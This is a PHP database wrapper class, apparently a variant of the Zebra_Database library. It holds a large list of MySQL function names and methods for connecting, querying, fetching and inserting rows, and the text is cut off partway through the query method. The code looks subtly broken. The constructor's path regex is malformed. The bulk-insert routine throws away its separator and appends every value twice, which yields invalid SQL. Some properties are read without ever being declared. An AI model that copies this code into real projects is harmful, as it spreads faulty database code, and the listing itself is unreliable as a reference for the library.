<?php 
class Db
{
    public $affected_rows = null;
    public $cache_path = null;
    public $caching_method = null;
    public $debug = null;
    public $debug_show_backtrace = null;
    public $debug_show_explain = null;
    public $debug_show_records = null;
    public $debugger_ip = null;
    public $disable_warnings = null;
    public $found_rows = null;
    public $halt_on_errors = null;
    public $log_path = null;
    public $max_query_time = null;
    public $memcache_compressed = null;
    public $memcache_host = null;
    public $memcache_port = null;
    public $memcache_key_prefix = null;
    public $minimize_console = null;
    public $notification_address = null;
    public $notifier_domain = null;
    public $returned_rows = null;
    public $resource_path = null;
    private $cached_results = null;
    private $connection = null;
    private $credentials = null;
    private $debug_info = null;
    private $language = null;
    private $memcache = null;
    private $options = null;
    private $path = null;
    private $total_execution_time = null;
    private $transaction_status = null;
    private $unbuffered = null;
    private $warnings = null;
    private $mysql_functions = [
        'ABS', 
        'ACOS', 
        'ADDDATE', 
        'ADDTIME', 
        'AES_DECRYPT', 
        'AES_ENCRYPT', 
        'ANY_VALUE', 
        'AREA', 
        'ASBINARY', 
        'ASWKB', 
        'ASCII', 
        'ASIN', 
        'ASTEXT', 
        'ASWKT', 
        'ASYMMETRIC_DECRYPT', 
        'ASYMMETRIC_DERIVE', 
        'ASYMMETRIC_ENCRYPT', 
        'ASYMMETRIC_SIGN', 
        'ASYMMETRIC_VERIFY', 
        'ATAN', 
        'ATAN2', 
        'ATAN', 
        'AVG', 
        'BENCHMARK', 
        'BIN', 
        'BIT_AND', 
        'BIT_COUNT', 
        'BIT_LENGTH', 
        'BIT_OR', 
        'BIT_XOR', 
        'BUFFER', 
        'CAST', 
        'CEIL', 
        'CEILING', 
        'CENTROID', 
        'CHAR', 
        'CHAR_LENGTH', 
        'CHARACTER_LENGTH', 
        'CHARSET', 
        'COALESCE', 
        'COERCIBILITY', 
        'COLLATION', 
        'COMPRESS', 
        'CONCAT', 
        'CONCAT_WS', 
        'CONNECTION_ID', 
        'CONTAINS', 
        'CONV', 
        'CONVERT', 
        'CONVERT_TZ', 
        'CONVEXHULL', 
        'COS', 
        'COT', 
        'COUNT', 
        'CRC32', 
        'CREATE_ASYMMETRIC_PRIV_KEY', 
        'CREATE_ASYMMETRIC_PUB_KEY', 
        'CREATE_DH_PARAMETERS', 
        'CREATE_DIGEST', 
        'CROSSES', 
        'CURDATE', 
        'CURRENT_DATE', 
        'CURRENT_TIME', 
        'CURRENT_TIMESTAMP', 
        'CURRENT_USER', 
        'CURTIME', 
        'DATABASE', 
        'DATE', 
        'DATE_ADD', 
        'DATE_FORMAT', 
        'DATE_SUB', 
        'DATEDIFF', 
        'DAY', 
        'DAYNAME', 
        'DAYOFMONTH', 
        'DAYOFWEEK', 
        'DAYOFYEAR', 
        'DECODE', 
        'DEFAULT', 
        'DEGREES', 
        'DES_DECRYPT', 
        'DES_ENCRYPT', 
        'DIMENSION', 
        'DISJOINT', 
        'DISTANCE', 
        'ELT', 
        'ENCODE', 
        'ENCRYPT', 
        'ENDPOINT', 
        'ENVELOPE', 
        'EQUALS', 
        'EXP', 
        'EXPORT_SET', 
        'EXTERIORRING', 
        'EXTRACT', 
        'EXTRACTVALUE', 
        'FIELD', 
        'FIND_IN_SET', 
        'FLOOR', 
        'FORMAT', 
        'FOUND_ROWS', 
        'FROM_BASE64', 
        'FROM_DAYS', 
        'FROM_UNIXTIME', 
        'GEOMCOLLFROMTEXT', 
        'GEOMETRYCOLLECTIONFROMTEXT', 
        'GEOMCOLLFROMWKB', 
        'GEOMETRYCOLLECTIONFROMWKB', 
        'GEOMETRYCOLLECTION', 
        'GEOMETRYN', 
        'GEOMETRYTYPE', 
        'GEOMFROMTEXT', 
        'GEOMETRYFROMTEXT', 
        'GEOMFROMWKB', 
        'GEOMETRYFROMWKB', 
        'GET_FORMAT', 
        'GET_LOCK', 
        'GLENGTH', 
        'GREATEST', 
        'GROUP_CONCAT', 
        'GTID_SUBSET', 
        'GTID_SUBTRACT', 
        'HEX', 
        'HOUR', 
        'IF', 
        'IFNULL', 
        'IN', 
        'INET_ATON', 
        'INET_NTOA', 
        'INET6_ATON', 
        'INET6_NTOA', 
        'INSERT', 
        'INSTR', 
        'INTERIORRINGN', 
        'INTERSECTS', 
        'INTERVAL', 
        'IS_FREE_LOCK', 
        'IS_IPV4', 
        'IS_IPV4_COMPAT', 
        'IS_IPV4_MAPPED', 
        'IS_IPV6', 
        'IS_USED_LOCK', 
        'ISCLOSED', 
        'ISEMPTY', 
        'ISNULL', 
        'ISSIMPLE', 
        'JSON_APPEND', 
        'JSON_ARRAY', 
        'JSON_ARRAY_APPEND', 
        'JSON_ARRAY_INSERT', 
        'JSON_CONTAINS', 
        'JSON_CONTAINS_PATH', 
        'JSON_DEPTH', 
        'JSON_EXTRACT', 
        'JSON_INSERT', 
        'JSON_KEYS', 
        'JSON_LENGTH', 
        'JSON_MERGE', 
        'JSON_OBJECT', 
        'JSON_QUOTE', 
        'JSON_REMOVE', 
        'JSON_REPLACE', 
        'JSON_SEARCH', 
        'JSON_SET', 
        'JSON_TYPE', 
        'JSON_UNQUOTE', 
        'JSON_VALID', 
        'LAST_DAY', 
        'LAST_INSERT_ID', 
        'LCASE', 
        'LEAST', 
        'LEFT', 
        'LENGTH', 
        'LINEFROMTEXT', 
        'LINESTRINGFROMTEXT', 
        'LINEFROMWKB', 
        'LINESTRINGFROMWKB', 
        'LINESTRING', 
        'LN', 
        'LOAD_FILE', 
        'LOCALTIME', 
        'LOCALTIMESTAMP', 
        'LOCATE', 
        'LOG', 
        'LOG10', 
        'LOG2', 
        'LOWER', 
        'LPAD', 
        'LTRIM', 
        'MAKE_SET', 
        'MAKEDATE', 
        'MAKETIME', 
        'MASTER_POS_WAIT', 
        'MAX', 
        'MBRCONTAINS', 
        'MBRCOVEREDBY', 
        'MBRCOVERS', 
        'MBRDISJOINT', 
        'MBREQUAL', 
        'MBREQUALS', 
        'MBRINTERSECTS', 
        'MBROVERLAPS', 
        'MBRTOUCHES', 
        'MBRWITHIN', 
        'MD5', 
        'MICROSECOND', 
        'MID', 
        'MIN', 
        'MINUTE', 
        'MLINEFROMTEXT', 
        'MULTILINESTRINGFROMTEXT', 
        'MLINEFROMWKB', 
        'MULTILINESTRINGFROMWKB', 
        'MOD', 
        'MONTH', 
        'MONTHNAME', 
        'MPOINTFROMTEXT', 
        'MULTIPOINTFROMTEXT', 
        'MPOINTFROMWKB', 
        'MULTIPOINTFROMWKB', 
        'MPOLYFROMTEXT', 
        'MULTIPOLYGONFROMTEXT', 
        'MPOLYFROMWKB', 
        'MULTIPOLYGONFROMWKB', 
        'MULTILINESTRING', 
        'MULTIPOINT', 
        'MULTIPOLYGON', 
        'NAME_CONST', 
        'NOT IN', 
        'NOW', 
        'NULLIF', 
        'NUMGEOMETRIES', 
        'NUMINTERIORRINGS', 
        'NUMPOINTS', 
        'OCT', 
        'OCTET_LENGTH', 
        'OLD_PASSWORD', 
        'ORD', 
        'OVERLAPS', 
        'PASSWORD', 
        'PERIOD_ADD', 
        'PERIOD_DIFF', 
        'PI', 
        'POINT', 
        'POINTFROMTEXT', 
        'POINTFROMWKB', 
        'POINTN', 
        'POLYFROMTEXT', 
        'POLYGONFROMTEXT', 
        'POLYFROMWKB', 
        'POLYGONFROMWKB', 
        'POLYGON', 
        'POSITION', 
        'POW', 
        'POWER', 
        'PROCEDURE ANALYSE', 
        'QUARTER', 
        'QUOTE', 
        'RADIANS', 
        'RAND', 
        'RANDOM_BYTES', 
        'RELEASE_ALL_LOCKS', 
        'RELEASE_LOCK', 
        'REPEAT', 
        'REPLACE', 
        'REVERSE', 
        'RIGHT', 
        'ROUND', 
        'ROW_COUNT', 
        'RPAD', 
        'RTRIM', 
        'SCHEMA', 
        'SEC_TO_TIME', 
        'SECOND', 
        'SESSION_USER', 
        'SHA1', 
        'SHA', 
        'SHA2', 
        'SIGN', 
        'SIN', 
        'SLEEP', 
        'SOUNDEX', 
        'SPACE', 
        'SQRT', 
        'SRID', 
        'ST_AREA', 
        'ST_ASBINARY', 
        'ST_ASWKB', 
        'ST_ASGEOJSON', 
        'ST_ASTEXT', 
        'ST_ASWKT', 
        'ST_BUFFER', 
        'ST_BUFFER_STRATEGY', 
        'ST_CENTROID', 
        'ST_CONTAINS', 
        'ST_CONVEXHULL', 
        'ST_CROSSES', 
        'ST_DIFFERENCE', 
        'ST_DIMENSION', 
        'ST_DISJOINT', 
        'ST_DISTANCE', 
        'ST_DISTANCE_SPHERE', 
        'ST_ENDPOINT', 
        'ST_ENVELOPE', 
        'ST_EQUALS', 
        'ST_EXTERIORRING', 
        'ST_GEOHASH', 
        'ST_GEOMCOLLFROMTEXT', 
        'ST_GEOMETRYCOLLECTIONFROMTEXT', 
        'ST_GEOMCOLLFROMTXT', 
        'ST_GEOMCOLLFROMWKB', 
        'ST_GEOMETRYCOLLECTIONFROMWKB', 
        'ST_GEOMETRYN', 
        'ST_GEOMETRYTYPE', 
        'ST_GEOMFROMGEOJSON', 
        'ST_GEOMFROMTEXT', 
        'ST_GEOMETRYFROMTEXT', 
        'ST_GEOMFROMWKB', 
        'ST_GEOMETRYFROMWKB', 
        'ST_INTERIORRINGN', 
        'ST_INTERSECTION', 
        'ST_INTERSECTS', 
        'ST_ISCLOSED', 
        'ST_ISEMPTY', 
        'ST_ISSIMPLE', 
        'ST_ISVALID', 
        'ST_LATFROMGEOHASH', 
        'ST_LENGTH', 
        'ST_LINEFROMTEXT', 
        'ST_LINESTRINGFROMTEXT', 
        'ST_LINEFROMWKB', 
        'ST_LINESTRINGFROMWKB', 
        'ST_LONGFROMGEOHASH', 
        'ST_MAKEENVELOPE', 
        'ST_MLINEFROMTEXT', 
        'ST_MULTILINESTRINGFROMTEXT', 
        'ST_MLINEFROMWKB', 
        'ST_MULTILINESTRINGFROMWKB', 
        'ST_MPOINTFROMTEXT', 
        'ST_MULTIPOINTFROMTEXT', 
        'ST_MPOINTFROMWKB', 
        'ST_MULTIPOINTFROMWKB', 
        'ST_MPOLYFROMTEXT', 
        'ST_MULTIPOLYGONFROMTEXT', 
        'ST_MPOLYFROMWKB', 
        'ST_MULTIPOLYGONFROMWKB', 
        'ST_NUMGEOMETRIES', 
        'ST_NUMINTERIORRING', 
        'ST_NUMINTERIORRINGS', 
        'ST_NUMPOINTS', 
        'ST_OVERLAPS', 
        'ST_POINTFROMGEOHASH', 
        'ST_POINTFROMTEXT', 
        'ST_POINTFROMWKB', 
        'ST_POINTN', 
        'ST_POLYFROMTEXT', 
        'ST_POLYGONFROMTEXT', 
        'ST_POLYFROMWKB', 
        'ST_POLYGONFROMWKB', 
        'ST_SIMPLIFY', 
        'ST_SRID', 
        'ST_STARTPOINT', 
        'ST_SYMDIFFERENCE', 
        'ST_TOUCHES', 
        'ST_UNION', 
        'ST_VALIDATE', 
        'ST_WITHIN', 
        'ST_X', 
        'ST_Y', 
        'STARTPOINT', 
        'STD', 
        'STDDEV', 
        'STDDEV_POP', 
        'STDDEV_SAMP', 
        'STR_TO_DATE', 
        'STRCMP', 
        'SUBDATE', 
        'SUBSTR', 
        'SUBSTRING', 
        'SUBSTRING_INDEX', 
        'SUBTIME', 
        'SUM', 
        'SYSDATE', 
        'SYSTEM_USER', 
        'TAN', 
        'TIME', 
        'TIME_FORMAT', 
        'TIME_TO_SEC', 
        'TIMEDIFF', 
        'TIMESTAMP', 
        'TIMESTAMPADD', 
        'TIMESTAMPDIFF', 
        'TO_BASE64', 
        'TO_DAYS', 
        'TO_SECONDS', 
        'TOUCHES', 
        'TRIM', 
        'TRUNCATE', 
        'UCASE', 
        'UNCOMPRESS', 
        'UNCOMPRESSED_LENGTH', 
        'UNHEX', 
        'UNIX_TIMESTAMP', 
        'UPDATEXML', 
        'UPPER', 
        'USER', 
        'UTC_DATE', 
        'UTC_TIME', 
        'UTC_TIMESTAMP', 
        'UUID', 
        'UUID_SHORT', 
        'VALIDATE_PASSWORD_STRENGTH', 
        'VALUES', 
        'VAR_POP', 
        'VAR_SAMP', 
        'VARIANCE', 
        'VERSION', 
        'WAIT_FOR_EXECUTED_GTID_SET', 
        'WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS', 
        'WEEK', 
        'WEEKDAY', 
        'WEEKOFYEAR', 
        'WEIGHT_STRING', 
        'WITHIN', 
        'X', 
        'Y', 
        'YEAR', 
        'YEARWEEK'
    ];
    public function __construct()
    {
        if( !extension_loaded('mysqli') ) 
        {
            trigger_error('Zebra_Database: mysqli extension is not enabled!', 256);
        }
        $this->path = preg_replace('/\\/', '/', dirname(__FILE__));
        $this->cache_path = $this->path . '/cache/';
        $this->debug_show_records = 20;
        $this->debug = $this->debug_show_backtrace = $this->debug_show_explain = $this->halt_on_errors = $this->minimize_console = false;
        $this->language('english');
        $this->max_query_time = 10;
        $this->log_path = $this->notification_address = $this->notifier_domain = $this->memcache_key_prefix = '';
        $this->total_execution_time = $this->transaction_status = 0;
        $this->caching_method = 'disk';
        $this->cached_results = $this->debug_info = $this->debugger_ip = $this->options = [];
        $this->connection = $this->memcache = $this->memcache_host = $this->memcache_port = $this->memcache_compressed = $this->unbuffered = false;
        $this->warnings = [
            'charset' => true, 
            'memcache' => true
        ];
        if( !isset($_SERVER['HTTP_X_REQUESTED_WITH']) || $_SERVER['HTTP_X_REQUESTED_WITH'] != 'XMLHttpRequest' ) 
        {
            register_shutdown_function([
                $this, 
                '_debug'
            ]);
        }
    }
    public function close($reset_options = false)
    {
        $result = @mysqli_close($this->connection);
        $this->connection = false;
        $this->credentials = [];
        if( $reset_options ) 
        {
            $this->options = [];
        }
        return $result;
    }
    public function connect($host, $user, $password, $database = '', $port = '', $socket = '', $connect = false)
    {
        if( !extension_loaded('memcache') || $this->caching_method == 'memcache' ) 
        {
            unset($this->warnings['memcache']);
        }
        $this->credentials = [
            'host' => $host, 
            'user' => $user, 
            'password' => $password, 
            'database' => $database, 
            'port' => ($port == '' ? ini_get('mysqli.default_port') : $port), 
            'socket' => ($socket == '' ? ini_get('mysqli.default_socket') : $socket)
        ];
        if( $connect ) 
        {
            $this->_connected();
        }
    }
    public function dcount($column, $table, $where = '', $replacements = '', $cache = false, $highlight = false)
    {
        $this->query("\n\n            SELECT\n                COUNT(" . $column . ") AS counted\n            FROM\n                " . $this->_escape($table) . (($where != '' ? ' WHERE ' . $where : '')), $replacements, $cache, false, $highlight);
        if( isset($this->last_result) && $this->last_result !== false && $this->returned_rows > 0 ) 
        {
            $row = $this->fetch_assoc();
            return $row['counted'];
        }
        return false;
    }
    public function delete($table, $where = '', $replacements = '', $highlight = false)
    {
        $this->query("\n\n            DELETE FROM\n                " . $this->_escape($table) . (($where != '' ? ' WHERE ' . $where : '')), $replacements, false, false, $highlight);
        return isset($this->last_result) && $this->last_result !== false;
    }
    public function dlookup($column, $table, $where = '', $replacements = '', $cache = false, $highlight = false)
    {
        $this->query("\n\n            SELECT\n                " . $column . "\n            FROM\n                " . $this->_escape($table) . (($where != '' ? ' WHERE ' . $where : '')) . "\n            LIMIT 1\n\n        ", $replacements, $cache, false, $highlight);
        if( isset($this->last_result) && $this->last_result !== false && $this->returned_rows > 0 ) 
        {
            $row = $this->fetch_assoc();
            if( count($row) == 1 ) 
            {
                return array_pop($row);
            }
            return $row;
        }
        return false;
    }
    public function dmax($column, $table, $where = '', $replacements = '', $cache = false, $highlight = false)
    {
        $this->query("\n\n            SELECT\n                MAX(" . $column . ") AS maximum\n            FROM\n                " . $this->_escape($table) . (($where != '' ? ' WHERE ' . $where : '')), $replacements, $cache, false, $highlight);
        if( isset($this->last_result) && $this->last_result !== false && $this->returned_rows > 0 ) 
        {
            $row = $this->fetch_assoc();
            return $row['maximum'];
        }
        return false;
    }
    public function dsum($column, $table, $where = '', $replacements = '', $cache = false, $highlight = false)
    {
        $this->query("\n\n            SELECT\n                SUM(" . $column . ") AS total\n            FROM\n                " . $this->_escape($table) . (($where != '' ? ' WHERE ' . $where : '')), $replacements, $cache, false, $highlight);
        if( isset($this->last_result) && $this->last_result !== false && $this->found_rows > 0 ) 
        {
            $row = $this->fetch_assoc();
            return $row['total'];
        }
        return false;
    }
    public function error()
    {
        return mysqli_error($this->connection);
    }
    public function escape($string)
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        if( get_magic_quotes_gpc() ) 
        {
            $string = stripslashes($string);
        }
        return mysqli_real_escape_string($this->connection, $string);
    }
    public function fetch_assoc($resource = '')
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        if( $resource == '' && isset($this->last_result) && $this->last_result !== false ) 
        {
            $resource =& $this->last_result;
        }
        if( $this->_is_result($resource) ) 
        {
            $result = mysqli_fetch_assoc($resource);
            if( $resource->type == 1 ) 
            {
                $this->_manage_unbuffered_query_info($resource, $result);
            }
            return $result;
        }
        else if( is_integer($resource) && isset($this->cached_results[$resource]) ) 
        {
            $result = current($this->cached_results[$resource]);
            next($this->cached_results[$resource]);
            return $result;
        }
        return $this->_log('errors', ['message' => $this->language['not_a_valid_resource']]);
    }
    public function fetch_assoc_all($index = '', $resource = '')
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        if( $resource == '' && isset($this->last_result) && $this->last_result !== false ) 
        {
            $resource =& $this->last_result;
        }
        if( $this->_is_result($resource) || is_integer($resource) && isset($this->cached_results[$resource]) ) 
        {
            $result = [];
            if( @$this->seek(0, $resource) ) 
            {
                while( $row = $this->fetch_assoc($resource) ) 
                {
                    if( trim($index) != '' && isset($row[$index]) ) 
                    {
                        $result[$row[$index]] = $row;
                        continue;
                    }
                    $result[] = $row;
                }
            }
            return $result;
        }
        return $this->_log('errors', ['message' => $this->language['not_a_valid_resource']]);
    }
    public function fetch_obj($resource = '')
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        if( $resource == '' && isset($this->last_result) && $this->last_result !== false ) 
        {
            $resource =& $this->last_result;
        }
        if( $this->_is_result($resource) ) 
        {
            $result = mysqli_fetch_object($resource);
            if( $resource->type == 1 ) 
            {
                $this->_manage_unbuffered_query_info($resource, $result);
            }
            return $result;
        }
        else if( is_integer($resource) && isset($this->cached_results[$resource]) ) 
        {
            $result = current($this->cached_results[$resource]);
            next($this->cached_results[$resource]);
            if( $result !== false ) 
            {
                $result = (object)$result;
            }
            return $result;
        }
        return $this->_log('errors', ['message' => $this->language['not_a_valid_resource']]);
    }
    public function fetch_obj_all($index = '', $resource = '')
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        if( $resource == '' && isset($this->last_result) && $this->last_result !== false ) 
        {
            $resource =& $this->last_result;
        }
        if( $this->_is_result($resource) || is_integer($resource) && isset($this->cached_results[$resource]) ) 
        {
            $result = [];
            if( @$this->seek(0, $resource) ) 
            {
                while( $row = $this->fetch_obj($resource) ) 
                {
                    if( trim($index) != '' && property_exists($row, $index) ) 
                    {
                        $result[$row->$index] = $row;
                        continue;
                    }
                    $result[] = $row;
                }
            }
            return $result;
        }
        return $this->_log('errors', ['message' => $this->language['not_a_valid_resource']]);
    }
    public function free_result($resource = '')
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        if( $resource == '' && isset($this->last_result) && $this->last_result !== false ) 
        {
            $resource =& $this->last_result;
        }
        if( $this->_is_result($resource) ) 
        {
            @mysqli_free_result($resource);
        }
    }
    public function get_columns($resource = '')
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        if( $resource == '' && isset($this->last_result) && $this->last_result !== false ) 
        {
            $resource =& $this->last_result;
        }
        if( $this->_is_result($resource) ) 
        {
            $result = [];
            while( $column_info = mysqli_fetch_field($resource) ) 
            {
                $result[$column_info->name] = get_object_vars($column_info);
            }
            return $result;
        }
        else if( is_integer($resource) && isset($this->cached_results[$resource]) ) 
        {
            return $this->column_info;
        }
        return $this->_log('errors', ['message' => $this->language['not_a_valid_resource']]);
    }
    public function get_link()
    {
        if( $this->_connected() ) 
        {
            return $this->connection;
        }
        return false;
    }
    public function get_selected_database()
    {
        if( $this->_connected() ) 
        {
            return $this->credentials['database'];
        }
        return false;
    }
    public function get_table_columns($table)
    {
        $this->query("\n\n            SHOW COLUMNS FROM " . $this->_escape($table) . "\n\n        ");
        return $this->fetch_assoc_all('Field');
    }
    public function get_table_status($table = '')
    {
        if( strpos($table, '.') !== false ) 
        {
            list($database, $table) = explode('.', $table, 2);
        }
        $this->query("\n            SHOW\n            TABLE\n            STATUS\n            " . ((isset($database) ? ' IN ' . $this->_escape($database) : '')) . "\n            " . ((trim($table) != '' ? 'LIKE ?' : '')) . "\n        ", [$table]);
        return $this->fetch_assoc_all('Name');
    }
    public function get_tables($database = '')
    {
        $result = $this->fetch_assoc_all('', $this->query("\n            SHOW TABLES" . (($database != '' ? ' IN ' . $this->_escape($database) : ''))));
        $tables = [];
        foreach( $result as $tableName ) 
        {
            $tables[] = array_pop($tableName);
        }
        return $tables;
    }
    public function implode($pieces)
    {
        $result = '';
        foreach( $pieces as $piece ) 
        {
            $result .= ((($result != '' ? ',' : '')) . '\'' . $this->escape($piece) . '\'');
        }
        return $result;
    }
    public function insert($table, $columns, $ignore = false, $highlight = false)
    {
        $cols = $this->_escape(array_keys($columns));
        $values = '';
        foreach( $columns as $column_name => $value ) 
        {
            $values .= ($values != '' ? ', ' : '');
            if( $this->_is_mysql_function($value) ) 
            {
                $values .= $value;
                unset($columns[$column_name]);
            }
            else
            {
                $values .= '?';
            }
        }
        $this->query("\n\n            INSERT" . (($ignore ? ' IGNORE' : '')) . " INTO\n                " . $this->_escape($table) . "\n                (" . $cols . ")\n            VALUES\n                (" . $values . ')', array_values($columns), false, false, $highlight);
        return isset($this->last_result) && $this->last_result !== false;
    }
    public function insert_bulk($table, $columns, $data, $ignore = false, $highlight = false)
    {
        $values = array_values($data);
        if( !is_array(array_pop($values)) ) 
        {
            return $this->_log('errors', ['message' => $this->language['data_not_an_array']]);
        }
        $sql = "\n            INSERT" . (($ignore ? ' IGNORE' : '')) . " INTO\n                " . $this->_escape($table) . "\n                (" . '`' . implode('`,`', $columns) . '`' . ")\n            VALUES\n        ";
        $sql_values = $value_set = '';
        foreach( $data as $values ) 
        {
            $sql_values .= ((($sql_values != '' ? ', ' : '')) . '(');
            $value_set = '';
            foreach( $values as $value ) 
            {
                ($value_set != '' ? ', ' : '');
                $value_set .= ((($this->_is_mysql_function($value) ? $value : '"' . $this->escape($value) . '"')) . (($this->_is_mysql_function($value) ? $value : '"' . $this->escape($value) . '"')));
            }
            $sql_values .= ($value_set . ')');
        }
        $sql .= $sql_values;
        $this->query($sql, '', false, false, $highlight);
        return isset($this->last_result) && $this->last_result !== false;
    }
    public function insert_id()
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        if( isset($this->last_result) && $this->last_result !== false ) 
        {
            return mysqli_insert_id($this->connection);
        }
        return $this->_log('errors', ['message' => $this->language['not_a_valid_resource']]);
    }
    public function insert_update($table, $columns, $update = [], $highlight = false)
    {
        if( !is_array($update) ) 
        {
            $update = [];
        }
        $cols = $this->_escape(array_keys($columns));
        $values = '';
        foreach( $columns as $column_name => $value ) 
        {
            $values .= ($values != '' ? ', ' : '');
            if( $this->_is_mysql_function($value) ) 
            {
                $values .= $value;
                unset($columns[$column_name]);
            }
            else
            {
                $values .= '?';
            }
        }
        if( empty($update) ) 
        {
            $update_cols = $this->_build_sql($columns);
            $update = $columns;
        }
        else
        {
            $update_cols = $this->_build_sql($update);
        }
        $this->query("\n\n            INSERT INTO\n                " . $this->_escape($table) . "\n                (" . $cols . ")\n            VALUES\n                (" . $values . ")\n            ON DUPLICATE KEY UPDATE\n                " . $update_cols, array_merge(array_values($columns), array_values($update)), false, false, $highlight);
        return isset($this->last_result) && $this->last_result !== false;
    }
    public function language($language)
    {
        $this->language = [
            'affected_rows' => 'affected rows', 
            'backtrace' => 'backtrace', 
            'cache_path_not_writable' => 'Could not cache query. Make sure path exists and is writable.', 
            'cannot_use_parameter_marker' => 'Cannot use a parameter marker ("?", question mark) in <br><br><pre>%s</pre><br>Use an actual value instead as it will be automatically escaped.', 
            'close_all' => 'close all', 
            'could_not_connect_to_database' => 'Could not connect to database', 
            'could_not_connect_to_memcache_server' => 'Could not connect to the memcache server', 
            'could_not_seek' => 'could not seek to specified row', 
            'could_not_select_database' => 'Could not select database', 
            'could_not_write_to_log' => 'Could not write to log file. Make sure the folder exists and is writable.', 
            'date' => 'Date', 
            'email_subject' => 'Slow query on %s!', 
            'email_content' => "The following query exceeded normal running time of %s seconds by running %s seconds: \n\n %s", 
            'error' => 'Error', 
            'errors' => 'errors', 
            'execution_time' => 'execution time', 
            'explain' => 'explain', 
            'data_not_an_array' => 'The third argument of <em>insert_bulk()</em> needs to be an array of arrays.', 
            'file' => 'File', 
            'file_could_not_be_opened' => 'Could not open file', 
            'from_cache' => 'from cache', 
            'function' => 'Function', 
            'globals' => 'globals', 
            'invalid_option' => '%s is an invalid connection option', 
            'line' => 'Line', 
            'memcache_extension_not_installed' => "Memcache extension not found.<br><span>\n                                                    For using memcache as caching method, PHP version must be 4.3.3+, must be compiled with the\n                                                    <a href=\"http://pecl.php.net/package/memcache\">memcached</a> extension, and needs to be\n                                                    configured with <em>--with-zlib[=DIR]</em>.</span>", 
            'miliseconds' => 'ms', 
            'mysql_error' => 'MySQL error', 
            'no' => 'No', 
            'no_active_session' => 'You have chosen to cache query results in sessions but there are no active session. Call <a href="http://php.net/manual/en/function.session-start.php" target="_blank">session_start()</a> before using the library!', 
            'no_transaction_in_progress' => 'No transaction in progress.', 
            'not_a_valid_resource' => 'Not a valid resource (make sure you specify a resource as argument for fetch_assoc()/fetch_obj() if you are executing a query inside the loop)', 
            'optimization_needed' => '<strong>WARNING</strong>: The first few results returned by this query are the same as returned by <strong>%s</strong> other queries!', 
            'options_before_connect' => 'The "option" method must be called before connecting to a MySQL server', 
            'returned_rows' => 'returned rows', 
            'seconds' => 'seconds', 
            'successful_queries' => 'successful queries', 
            'to_top' => 'to the top', 
            'transaction_in_progress' => 'Transaction could not be started as another transaction is in progress.', 
            'unbuffered' => 'unbuffered', 
            'unbuffered_queries_cannot_be_cached' => 'Unbuffered queries cannot be cached', 
            'unsuccessful_queries' => 'unsuccessful queries', 
            'unusable_method_unbuffered_queries' => '%s() method cannot be used with unbuffered queries', 
            'warning_charset' => 'No default charset and collation were set. Call <a href="http://stefangabos.ro/wp-content/docs/Zebra_Database/Zebra_Database/Zebra_Database.html#methodset_charset">set_charset()</a> after connecting to the database.', 
            'warning_memcache' => 'The "memcache" extension is available on you server - consider using memcache for caching query results.<br>See <a href="http://stefangabos.ro/wp-content/docs/Zebra_Database/Zebra_Database/Zebra_Database.html#var$caching_method">the documentation</a> for more information.', 
            'warning_replacements_not_array' => '<em>$replacements</em> must be an arrays of values', 
            'warning_replacements_wrong_number' => 'the number of items to replace is different than the number of items in the <em>$replacements</em> array', 
            'warning_wait_timeout' => 'The value of MySQL\'s <em>wait_timeout</em> variable is set to %s. The <em>wait_timeout</em> variable represents the time, in seconds, that MySQL will wait before killing an idle connection. After a script finishes execution, the MySQL connection is not actually terminated but it is put in an idle state and is being reused if the same user requires a database connection (a very common scenario is when users navigate through the pages of a website). The default value of <em>wait_timeout</em> is 28800 seconds, or 8 hours. If you have lots of visitors this can lead to a <em><a href="http://dev.mysql.com/doc/refman/5.5/en/too-many-connections.html" target="_blank">Too many connections</a></em> error, as eventualy there will be times when no <a href="http://dev.mysql.com/doc/refman/5.5/en/server-system-variables.html#sysvar_max_connections" target="_blank">free connections</a> will be available. The recommended value is 300 seconds (5 minutes).', 
            'warning' => 'Warning', 
            'warnings' => 'warnings', 
            'yes' => 'Yes'
        ];
    }
    public function optimize($table = '')
    {
        if( strpos($table, '.') !== false ) 
        {
            $database = substr($table, 0, strpos($table, '.'));
        }
        $tables = $this->get_table_status($table);
        foreach( $tables as $table ) 
        {
            $this->query('OPTIMIZE TABLE ' . ((isset($database) ? $this->_escape($database) . '.' : '')) . $this->_escape($table['Name']));
        }
    }
    public function option($option, $value = '')
    {
        if( $this->connection ) 
        {
            return $this->_log('errors', ['message' => $this->language['options_before_connect']]);
        }
        if( is_array($option) ) 
        {
            foreach( $option as $property => $value ) 
            {
                $this->options[$property] = $value;
            }
        }
        else
        {
            $this->options[$option] = $value;
        }
    }
    public function parse_file($path)
    {
        $file_content = file($path);
        if( $file_content ) 
        {
            $query = '';
            foreach( $file_content as $sql_line ) 
            {
                $tsql = trim($sql_line);
                if( $tsql != '' && substr($tsql, 0, 2) != '--' && substr($tsql, 0, 1) != '#' ) 
                {
                    $query .= $sql_line;
                    if( preg_match('/;\s*$/', $sql_line) ) 
                    {
                        $this->query($query);
                        $query = '';
                    }
                }
            }
            return true;
        }
        return $this->_log('errors', ['message' => $this->language['file_could_not_be_opened']]);
    }
    public function query($sql, $replacements = '', $cache = false, $calc_rows = false, $highlight = false)
    {
        if( !$this->_connected() ) 
        {
            return false;
        }
        unset($this->affected_rows);
        if( $replacements != '' && !is_array($replacements) ) 
        {
            return $this->_log('unsuccessful-queries', [
                'query' => $sql, 
                'error' => $this->language['warning_replacements_not_array']
            ]);
        }
        if( $replacements != '' && is_array($replacements) && !empty($replacements) ) 
        {
            preg_match_all('/\?/', $sql, $matches, PREG_OFFSET_CAPTURE);
            if( !empty($matches[0]) && count($matches[0]) != count($replacements) ) 
            {
                return $this->_log('unsuccessful-queries', [
                    'query' => $sql, 
                    'error' => $this->language['warning_replacements_wrong_number']
                ]);
            }
            $pattern1 = $pattern2 = $replacements1 = $replacements2 = [];
            foreach( $matches[0] as $match ) 
            {
                $pattern1[] = '/\\' . $match[0] . '/';
            }
            foreach( $replacements as $key => $replacement ) 
            {
                $randomstr = md5(microtime()) . $key;
                $replacements1[] = $randomstr;
                if( $replacement === null ) 
                {
                    $replacements2[$key] = 'NULL';
                }
                else if( is_array($replacement) ) 
                {
